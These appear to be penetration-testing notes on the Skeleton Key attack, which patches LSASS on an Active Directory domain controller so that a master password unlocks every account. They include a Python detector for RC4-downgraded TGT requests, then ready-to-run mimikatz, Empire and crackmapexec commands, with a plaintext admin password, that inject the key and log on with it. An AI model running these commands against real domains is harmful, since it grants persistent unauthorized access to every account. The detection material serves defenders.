The Skeleton Key attack tampers with both authentication methods. During NTLM authentication, the hash of the master password injected into the LSASS process is not matched against the SAM database; instead it is matched against the Skeleton Key hash, which completes the authentication. Kerberos encryption is also downgraded to an algorithm that does not support a salt (RC4_HMAC_MD5), and the hash retrieved from Active Directory is replaced with the Skeleton Key hash. The master password hash is therefore validated server-side, which leads to successful authentication for both the Kerberos and NTLM methods.
mimikatz injects the Skeleton Key hash into the LSASS process on the domain controller and hijacks both the NTLM and Kerberos authentication paths:
- For NTLM authentication, if the supplied hash is the Skeleton Key hash, the hash in the SAM database is not queried and compared against it.
- For Kerberos authentication, my understanding is as follows: the Kerberos encryption method is downgraded to RC4_HMAC_MD5, so that in the first step, the TGT request, the timestamp is encrypted with the unsalted NT hash (RC4_HMAC_MD5); when the LSASS process queries AD for the corresponding user's hash to decrypt the timestamp, that hash is replaced with the Skeleton Key hash, so the user is validated successfully and a TGT is returned.
Because this method injects into the DC's LSA process, it requires Domain Admins privileges, and the injected key is lost after a reboot.
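The Kerberos half of the technique leaves a visible trace on the domain controller: an AES-capable account suddenly obtaining a TGT over RC4-HMAC. The following is an added detection example, not code from the original notes or from mimikatz. It assumes the DC audits TGT requests (Event ID 4768, whose Ticket Encryption Type field reports 0x17 for RC4-HMAC), that a baseline of which accounts are configured for AES is available, and it runs over constructed sample records in a simplified key=value form rather than real DC logs.

```python
"""
Flag successful TGT requests that used RC4-HMAC for accounts that normally use AES.

Assumptions (not from the page): Event ID 4768 is audited on the DC, and the
AES_ENABLED_ACCOUNTS baseline reflects which accounts have AES enabled in AD.
The events below are constructed samples in a simplified key=value format.
"""
from collections import defaultdict

RC4_HMAC = 0x17            # Ticket Encryption Type value for RC4-HMAC
AES_ETYPES = {0x11, 0x12}  # AES128 / AES256 CTS-HMAC-SHA1-96

# Constructed sample of audit records, one per line (key=value pairs).
SAMPLE_EVENTS = """\
EventID=4768 TargetUserName=alice TargetDomainName=PENTESTLAB IpAddress=10.0.0.50 TicketEncryptionType=0x12 Status=0x0
EventID=4768 TargetUserName=bob TargetDomainName=PENTESTLAB IpAddress=10.0.0.51 TicketEncryptionType=0x12 Status=0x0
EventID=4768 TargetUserName=alice TargetDomainName=PENTESTLAB IpAddress=10.0.0.99 TicketEncryptionType=0x17 Status=0x0
EventID=4768 TargetUserName=svc_legacy TargetDomainName=PENTESTLAB IpAddress=10.0.0.20 TicketEncryptionType=0x17 Status=0x0
EventID=4768 TargetUserName=bob TargetDomainName=PENTESTLAB IpAddress=10.0.0.99 TicketEncryptionType=0x17 Status=0x0
EventID=4769 TargetUserName=alice TargetDomainName=PENTESTLAB IpAddress=10.0.0.50 TicketEncryptionType=0x17 Status=0x0
"""

# Constructed baseline (assumption): accounts whose msDS-SupportedEncryptionTypes
# allows AES. Accounts not listed are treated as legacy RC4-only and not flagged.
AES_ENABLED_ACCOUNTS = {"alice", "bob"}


def parse_event(line):
    """Parse one key=value record into a dict; TicketEncryptionType becomes an int."""
    fields = dict(kv.split("=", 1) for kv in line.split())
    fields["TicketEncryptionType"] = int(fields["TicketEncryptionType"], 16)
    return fields


def find_rc4_downgrades(log_text, aes_accounts=AES_ENABLED_ACCOUNTS):
    """Return successful 4768 records where an AES-capable account got a TGT over RC4."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        # Only TGT requests (4768) that succeeded (Status 0x0) are of interest;
        # 4769 service-ticket events are deliberately ignored here.
        if ev["EventID"] != "4768" or ev["Status"] != "0x0":
            continue
        if ev["TicketEncryptionType"] == RC4_HMAC and ev["TargetUserName"] in aes_accounts:
            hits.append(ev)
    return hits


def downgraded_users_by_source(hits):
    """Group flagged logons by client address: one source authenticating as several
    AES accounts over RC4 is the pattern a shared master password produces."""
    per_source = defaultdict(set)
    for ev in hits:
        per_source[ev["IpAddress"]].add(ev["TargetUserName"])
    return {ip: sorted(users) for ip, users in per_source.items()}


if __name__ == "__main__":
    downgrades = find_rc4_downgrades(SAMPLE_EVENTS)
    for ev in downgrades:
        print(f"RC4 TGT for AES account {ev['TargetUserName']} from {ev['IpAddress']}")
    print(downgraded_users_by_source(downgrades))
```

The baseline matters: a domain that still has RC4-only service accounts will produce legitimate 0x17 tickets, so the check is scoped to accounts known to support AES, and the per-source grouping is what separates a single misconfigured host from one client logging on as many unrelated users.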
# Inject the skeleton key
## mimikatz
privilege::debug
misc::skeleton
## empire
usemodule persistence/misc/skeleton_key*
execute
## crackmapexec
crackmapexec smb 192.168.1.105 -u 'Administrator' -p 'Ignite@987' -M mimikatz -o COMMAND='misc::skeleton'
# Use the skeleton password as a master password: any user can authenticate with it
net use R: \\WIN-S0V7KMTVLD2\admin$ /user:Administrator mimikatz
rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab